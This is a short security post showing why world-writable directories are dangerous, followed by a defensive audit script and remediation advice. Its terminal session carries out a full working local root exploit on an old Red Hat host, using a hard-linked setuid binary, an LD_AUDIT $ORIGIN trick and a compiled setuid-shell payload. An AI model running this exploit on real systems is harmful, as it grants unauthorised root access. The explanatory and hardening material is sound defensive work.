# Why are 777 directories simply BAD?

```
# check it out...
[HiddenHost/]$ find / -xdev -type d -perm -o+w
/tmp
/nsr/dedup
/nsr/dedup/cache
/nsr/dedup/logs
/nsr/applogs
/etc/nginx/run
[HiddenHost /]$ ls -al /nsr/dedup
total 16
drwxrwxrwx  4 root root 4096 Oct  5  2009 .
drwxr-xr-x 13 root root 4096 Oct  5  2009 ..
drwxrwxrwx  2 root root 4096 Oct  5  2009 cache
drwxrwxrwx  2 root root 4096 Oct  5  2009 logs
[HiddenHost /]$ cd /nsr/applogs/
[HiddenHost applogs]$ which ping
/bin/ping
[HiddenHost applogs]$ ls -al /bin/ping
-rwsr-xr-x 1 root root 37312 Apr 24  2009 /bin/ping
[HiddenHost applogs]$ mkdir exploit
[HiddenHost applogs]$ ln /bin/ping /nsr/applogs/exploit/target
[HiddenHost applogs]$ exec 3< /nsr/applogs/exploit/target
[HiddenHost applogs]$ rm -rf /nsr/applogs/exploit/
[HiddenHost applogs]$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
[HiddenHost applogs]$ gcc -w -fPIC -shared -o ./exploit payload.c
[HiddenHost applogs]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[HiddenHost applogs]# id
uid=0(root) gid=4030(ucc) groups=4030(ucc)
[HiddenHost applogs]# cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
[HiddenHost applogs]#
```
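The session works because a world-writable directory (`/nsr/applogs`) sits on the same filesystem as a setuid binary (`/bin/ping`), so an unprivileged user can hard-link one into the other. An audit for that condition, as an added example that is not part of the original post: the function names are hypothetical, and the `fs.protected_hardlinks` sysctl it reports was introduced in Linux 3.6 and is not mentioned in the post.

```shell
#!/bin/sh
# Added example, not from the original post. Run as root for full coverage.
# Usage after sourcing this file:  audit_fs /

# World-writable directories under ROOT, staying on ROOT's filesystem
# (same test as the post's find). Each line is tagged NOSTICKY or STICKY.
world_writable_dirs() {
    find "${1:-/}" -xdev -type d -perm -0002 ! -perm -1000 -print 2>/dev/null |
        sed 's/^/NOSTICKY /'
    find "${1:-/}" -xdev -type d -perm -0002 -perm -1000 -print 2>/dev/null |
        sed 's/^/STICKY /'
}

# Setuid/setgid regular files on that same filesystem: the files a local
# user could hard-link into one of the directories listed above.
setid_files() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Kernel hard-link restriction (fs.protected_hardlinks, Linux 3.6+).
# Prints 1, 0, or "unavailable" on kernels without the sysctl.
hardlink_protection() {
    if [ -r /proc/sys/fs/protected_hardlinks ]; then
        cat /proc/sys/fs/protected_hardlinks
    else
        echo unavailable
    fi
}

# Returns 1 when ROOT's filesystem holds both a world-writable directory
# and a setuid/setgid file, 0 otherwise. Prints the directories found.
audit_fs() {
    dirs=$(world_writable_dirs "$1")
    bins=$(setid_files "$1")
    if [ -n "$dirs" ]; then
        printf '%s\n' "$dirs"
    fi
    if [ -n "$dirs" ] && [ -n "$bins" ]; then
        count=$(printf '%s\n' "$bins" | wc -l)
        echo "FINDING: world-writable dirs share a filesystem with $count setuid/setgid file(s)"
        echo "fs.protected_hardlinks: $(hardlink_protection)"
        return 1
    fi
    return 0
}
```

A finding is cleared by removing the `o+w` bit from application directories such as `/nsr/applogs`, or by moving them to a separate filesystem mounted `nosuid` so that no setuid file can share a device with them.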